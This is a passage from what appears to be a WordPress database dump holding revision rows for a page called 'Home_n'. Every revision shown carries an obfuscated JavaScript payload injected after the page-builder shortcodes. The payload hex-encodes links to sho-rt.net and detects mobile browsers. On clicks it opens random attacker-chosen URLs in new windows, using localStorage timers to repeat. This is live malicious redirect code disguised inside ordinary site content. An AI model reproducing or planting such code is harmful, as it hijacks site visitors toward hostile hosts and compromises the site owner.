_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:34:34','2022-11-08 21:34:34','',3066,'https://gsw2023.com/?p=3070',0,'revision','',0),
(3072,1,'2022-11-08 21:36:56','2022-11-08 21:36:56','[vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:36:56','2022-11-08 21:36:56','',3066,'https://gsw2023.com/?p=3072',0,'revision','',0),
(3073,1,'2022-11-08 21:43:59','2022-11-08 21:43:59','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:43:59','2022-11-08 21:43:59','',3066,'https://gsw2023.com/?p=3073',0,'revision','',0),
(3074,1,'2022-11-08 21:44:08','2022-11-08 21:44:08','[vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const 